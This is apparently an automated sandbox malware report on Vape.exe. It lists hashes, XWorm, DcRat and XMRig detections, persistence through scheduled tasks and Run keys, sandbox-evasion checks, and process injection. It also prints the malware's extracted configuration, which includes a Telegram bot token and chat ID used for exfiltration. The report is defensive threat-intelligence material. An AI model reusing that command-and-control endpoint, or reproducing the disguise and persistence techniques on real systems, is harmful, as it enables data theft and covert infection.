Analysis
max time kernel: 83s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-05-2024 13:39
Static task: static1
Behavioral task behavioral1: Sample Vape.exe, Resource win10-20240404-en
Behavioral task behavioral2: Sample Vape.exe, Resource win7-20240221-en
Behavioral task behavioral3: Sample Vape.exe, Resource win10-20240404-en
Behavioral task behavioral4: Sample Vape.exe, Resource win10v2004-20240508-en
Behavioral task behavioral5: Sample Vape.exe, Resource win11-20240426-en
Behavioral task behavioral6: Sample Vape.exe, Resource macos-20240410-en
General
Target: Vape.exe
Size: 16.9MB
MD5: b682cd3286eb0cd188dc896d6fd7fa0c
SHA1: f6f15cbc94072cbdab5ae4548c4b13d787f6f617
SHA256: 66ac4015c48cc00c995fc8910d09e2ccc0b559785fc52a959a4d2de9fdb8c62b
SHA512: a30ada153f1c2ead70bbe27b3bb770512d04b469ec3e3f19266f81cd06150e1297e06877c5ed899040a7a760d64d24892477df17294721fd8560082a634ce2f5
SSDEEP: 393216:61HGgtq8HRisK/m6Smj8xBPKEUVrHCKAfcI:6tGOqKRO/9Smj8bPsxsfcI
Malware Config
Extracted: xworm
Install_directory: %AppData%
install_file: Microsoft_WindowsDefender.exe
pastebin_url: https://pastebin.com/raw/dxKNAdeE
telegram: https://api.telegram.org/bot7013809678:AAEFwh-OW3w4YnEldOGR6NvGudG5gj8iF0Q/sendMessage?chat_id=5073217277
Signatures
-
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.
-
Detect Xworm Payload 3 IoCs
Processes (yara_rule: resource):
family_xworm: behavioral4/memory/1884-104-0x0000000000790000-0x00000000007A8000-memory.dmp
family_xworm: C:\Users\Admin\AppData\Local\Temp\Msvchost.exe
family_xworm: behavioral4/memory/7896-2008-0x0000000000DE0000-0x0000000000DF8000-memory.dmp
-
Process spawned unexpected child process 45 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description, pid, pid_target, process, target process):
All 45 rows carry the same description: "Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process". In every row the target process is wmiprvse.exe with pid_target 432 and the spawned process is schtasks.exe, with the following pids in report order:
5416, 5492, 5560, 6112, 6452, 6896, 6152, 2520, 7116, 4836, 5172, 5588, 864, 4828, 1424, 3228, 6032, 5764, 5788, 5272, 6116, 3564, 7068, 6272, 5816, 6668, 6536, 2828, 5600, 5700, 6248, 6072, 6600, 3788, 6364, 6368, 6604, 5492, 6324, 6640, 6712, 5776, 5552, 5424, 5416
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes (description, pid, process, target process):
PID 6308 WerFault.exe created PID 7444 WMIC.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes (description, pid, process, target process):
PID 6724 svchost.exe created PID 7444 WMIC.exe
PID 6724 svchost.exe created PID 6092 powershell.exe
-
Processes (yara_rule: resource):
dcrat: C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe
dcrat: behavioral4/memory/3620-258-0x00000000004B0000-0x000000000063C000-memory.dmp
dcrat: C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe
-
XMRig Miner payload 7 IoCs
Processes (yara_rule: resource):
xmrig: behavioral4/memory/6512-566-0x0000000140000000-0x0000000140848000-memory.dmp
xmrig: behavioral4/memory/6512-565-0x0000000140000000-0x0000000140848000-memory.dmp
xmrig: behavioral4/memory/6512-593-0x0000000140000000-0x0000000140848000-memory.dmp
xmrig: behavioral4/memory/6512-591-0x0000000140000000-0x0000000140848000-memory.dmp
xmrig: behavioral4/memory/6512-592-0x0000000140000000-0x0000000140848000-memory.dmp
xmrig: behavioral4/memory/6512-589-0x0000000140000000-0x0000000140848000-memory.dmp
xmrig: behavioral4/memory/6512-590-0x0000000140000000-0x0000000140848000-memory.dmp
-
Processes (pid, process):
3228 powershell.exe
6700 powershell.exe
2172 powershell.exe
1864 powershell.exe
4316 powershell.exe
5768 powershell.exe
6736 powershell.exe
-
Creates new service(s) 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (process: description ioc):
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, likely for geofencing.
Processes (process: description ioc):
Microsoft_Protection.exe: Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Msvchost.exe: Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
WScript.exe: Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Intoref.exe: Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Vape.exe: Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
-
Drops startup file 2 IoCs
Processes (process: description ioc):
Msvchost.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk
Msvchost.exe: File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk
-
Executes dropped EXE 13 IoCs
Processes (pid, process):
4828 Microsoft_Protection.exe
400 Microsoft_crypt.exe
2852 Microsoft_R.exe
4692 Microsoft_R.exe
3600 Microsoft_M.exe
1884 Msvchost.exe
4700 Microsoft_M.exe
3620 Intoref.exe
6684 lhhsgwktkatl.exe
6704 msedge.exe
5200 rar.exe
6360 rar.exe
7896 Microsoft_WindowsDefender.exe
-
Loads dropped DLL 33 IoCs
Processes (pid, process; one row per IoC, 33 rows in total):
4692 Microsoft_R.exe (repeated)
4700 Microsoft_M.exe (repeated)
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes (yara_rule: resource):
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\python311.dll
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_ctypes.pyd
upx: behavioral4/memory/4692-139-0x00007FFFA16A0000-0x00007FFFA16AF000-memory.dmp
upx: behavioral4/memory/4692-138-0x00007FFFA0BA0000-0x00007FFFA0BC3000-memory.dmp
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\sqlite3.dll
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\select.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_hashlib.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\unicodedata.pyd
upx: behavioral4/memory/4692-181-0x00007FFF92910000-0x00007FFF92933000-memory.dmp
upx: behavioral4/memory/4692-187-0x00007FFF8C390000-0x00007FFF8C709000-memory.dmp
upx: behavioral4/memory/4692-194-0x00007FFF8C270000-0x00007FFF8C38C000-memory.dmp
upx: behavioral4/memory/4700-206-0x00007FFF9FEA0000-0x00007FFF9FEAF000-memory.dmp
upx: behavioral4/memory/4700-205-0x00007FFF8AA60000-0x00007FFF8AA83000-memory.dmp
upx: C:\Users\Admin\AppData\Local\Temp\_MEI36002\libffi-8.dll
upx: C:\Users\Admin\AppData\Local\Temp\_MEI36002\libssl-1_1.dll
upx: C:\Users\Admin\AppData\Local\Temp\_MEI36002\libcrypto-1_1.dll
upx: behavioral4/memory/4700-214-0x00007FFF888B0000-0x00007FFF88A20000-memory.dmp
upx: behavioral4/memory/4700-217-0x00007FFF897F0000-0x00007FFF8981E000-memory.dmp
upx: behavioral4/memory/4700-220-0x00007FFF8A610000-0x00007FFF8A624000-memory.dmp
upx: behavioral4/memory/4700-223-0x00007FFF9A6C0000-0x00007FFF9A6CD000-memory.dmp
upx: behavioral4/memory/4700-224-0x00007FFF88090000-0x00007FFF881AC000-memory.dmp
upx: behavioral4/memory/4700-219-0x00007FFF881B0000-0x00007FFF88268000-memory.dmp
upx: behavioral4/memory/4700-218-0x00007FFF85EB0000-0x00007FFF86229000-memory.dmp
upx: behavioral4/memory/4700-216-0x00007FFF9FE20000-0x00007FFF9FE2D000-memory.dmp
upx: behavioral4/memory/4700-215-0x00007FFF8A630000-0x00007FFF8A649000-memory.dmp
upx: behavioral4/memory/4700-213-0x00007FFF8A650000-0x00007FFF8A673000-memory.dmp
upx: behavioral4/memory/4700-212-0x00007FFF8AA40000-0x00007FFF8AA59000-memory.dmp
upx: behavioral4/memory/4700-211-0x00007FFF8A680000-0x00007FFF8A6AD000-memory.dmp
upx: behavioral4/memory/4700-195-0x00007FFF8C940000-0x00007FFF8CF29000-memory.dmp
upx: behavioral4/memory/4692-193-0x00007FFFA0B50000-0x00007FFFA0B5D000-memory.dmp
upx: behavioral4/memory/4692-192-0x00007FFF8DBD0000-0x00007FFF8DBE4000-memory.dmp
upx: behavioral4/memory/4692-186-0x00007FFF8C710000-0x00007FFF8C7C8000-memory.dmp
upx: behavioral4/memory/4692-185-0x00007FFF8DBF0000-0x00007FFF8DC1E000-memory.dmp
upx: behavioral4/memory/4692-184-0x00007FFFA12C0000-0x00007FFFA12CD000-memory.dmp
upx: behavioral4/memory/4692-183-0x00007FFF92D20000-0x00007FFF92D39000-memory.dmp
upx: behavioral4/memory/4692-182-0x00007FFF8C7D0000-0x00007FFF8C940000-memory.dmp
upx: behavioral4/memory/4692-180-0x00007FFFA0B80000-0x00007FFFA0B99000-memory.dmp
upx: behavioral4/memory/4692-179-0x00007FFF92D40000-0x00007FFF92D6D000-memory.dmp
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_queue.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_ssl.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_socket.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_sqlite3.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_bz2.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_lzma.pyd
upx: C:\Users\Admin\AppData\Local\Temp\_MEI28522\_decimal.pyd
upx: behavioral4/memory/4692-87-0x00007FFF8CF30000-0x00007FFF8D519000-memory.dmp
upx: behavioral4/memory/6512-561-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-566-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-565-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-560-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-563-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-593-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-591-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-592-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-589-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-590-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-564-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/6512-562-0x0000000140000000-0x0000000140848000-memory.dmp
upx: behavioral4/memory/4692-1441-0x00007FFF8CF30000-0x00007FFF8D519000-memory.dmp
upx: behavioral4/memory/4692-1661-0x00007FFFA0BA0000-0x00007FFFA0BC3000-memory.dmp
upx: behavioral4/memory/4692-1887-0x00007FFF8C7D0000-0x00007FFF8C940000-memory.dmp
upx: behavioral4/memory/4692-1890-0x00007FFF8C390000-0x00007FFF8C709000-memory.dmp
upx: behavioral4/memory/4692-1889-0x00007FFF8C710000-0x00007FFF8C7C8000-memory.dmp
upx: behavioral4/memory/4692-1888-0x00007FFF8DBF0000-0x00007FFF8DC1E000-memory.dmp
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes (process: description ioc):
Msvchost.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft_WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft_WindowsDefender.exe"
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
flow 31: ip-api.com
-
Drops file in System32 directory 15 IoCs
Processes (process: description ioc):
svchost.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
svchost.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
lhhsgwktkatl.exe: File opened for modification C:\Windows\system32\MRT.exe
svchost.exe: File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx
svchost.exe: File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
svchost.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
svchost.exe: File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan
OfficeClickToRun.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml
Microsoft_crypt.exe: File opened for modification C:\Windows\system32\MRT.exe
powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
svchost.exe: File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
svchost.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
svchost.exe: File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
svchost.exe: File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
-
Suspicious use of SetThreadContext 4 IoCs
Processes (description, pid, process, target process):
PID 400 Microsoft_crypt.exe set thread context of PID 5716 dialer.exe
PID 6684 lhhsgwktkatl.exe set thread context of PID 2520 dialer.exe
PID 6684 lhhsgwktkatl.exe set thread context of PID 6468 dialer.exe
PID 6684 lhhsgwktkatl.exe set thread context of PID 6512 dialer.exe
-
Drops file in Program Files directory 6 IoCs
Processes (process: description ioc):
Intoref.exe: File created C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe
Intoref.exe: File created C:\Program Files (x86)\Microsoft.NET\RedistList\5940a34987c991
Intoref.exe: File created C:\Program Files\Windows Photo Viewer\en-US\fontdrvhost.exe
Intoref.exe: File created C:\Program Files\Windows Photo Viewer\en-US\5b884080fd4f94
Intoref.exe: File created C:\Program Files\Windows Security\BrowserCore\en-US\WaaSMedicAgent.exe
Intoref.exe: File created C:\Program Files\Windows Security\BrowserCore\en-US\c82b8037eab33d
-
Drops file in Windows directory 6 IoCs
Processes (process: description ioc):
Intoref.exe: File created C:\Windows\Help\msedge.exe
Intoref.exe: File created C:\Windows\Help\61a52ddc9dd915
Intoref.exe: File created C:\Windows\WinSxS\Registry.exe
Intoref.exe: File created C:\Windows\WinSxS\x86_netfx4-clrjit_dll_b03f5f7f11d50a3a_4.0.15805.110_none_651953c043d81ca4\wininit.exe
Intoref.exe: File created C:\Windows\security\templates\cmd.exe
Intoref.exe: File created C:\Windows\security\templates\ebf1f9fa8afd6d
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility used to control services on the system.
Processes (pid, process):
6368 sc.exe
5924 sc.exe
5932 sc.exe
6376 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 20 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (process: description ioc):
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc
wmiprvse.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service
wmiprvse.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver
wmiprvse.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
wmiprvse.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags
-
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (process: description ioc):
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
mousocoreworker.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
mousocoreworker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
wmiprvse.exe: Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information
mousocoreworker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1
wmiprvse.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
mousocoreworker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
mousocoreworker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
mousocoreworker.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
wmiprvse.exe: Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
-
Creates scheduled task(s) 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, process; all 46 rows are schtasks.exe, pids in report order):
5764, 5788, 6668, 2828, 5600, 5700, 5492, 6072, 6368, 5416, 6112, 6600, 5492, 6640, 5552, 4828, 6152, 7116, 5588, 6032, 6604, 5424, 5560, 6452, 6896, 3564, 3788, 6364, 6324, 4040, 1424, 3228, 5272, 6116, 7068, 6712, 5776, 864, 4836, 5172, 5816, 6536, 6248, 5416, 6272, 2520
-
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
Processes (pid, process):
5524 WMIC.exe
5472 WMIC.exe
8116 WMIC.exe
1996 WMIC.exe
3404 WMIC.exe
4404 WMIC.exe
-
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes (pid, process):
6672 tasklist.exe
380 tasklist.exe
512 tasklist.exe
5456 tasklist.exe
5468 tasklist.exe
5180 tasklist.exe
5728 tasklist.exe
4108 tasklist.exe
-
Enumerates system info in registry 2 TTPs 7 IoCs
Processes (process: description ioc):
mousocoreworker.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
mousocoreworker.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
wmiprvse.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes (pid, process):
5212 systeminfo.exe
6720 systeminfo.exe
-
Kills process with taskkill 11 IoCs
Processes (pid, process):
7344 taskkill.exe
5272 taskkill.exe
6092 taskkill.exe
6372 taskkill.exe
7520 taskkill.exe
6492 taskkill.exe
6900 taskkill.exe
6472 taskkill.exe
7248 taskkill.exe
7756 taskkill.exe
8008 taskkill.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018800EF584BD80" | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | dialer.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | dialer.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018800EF584BD80 = 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 | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
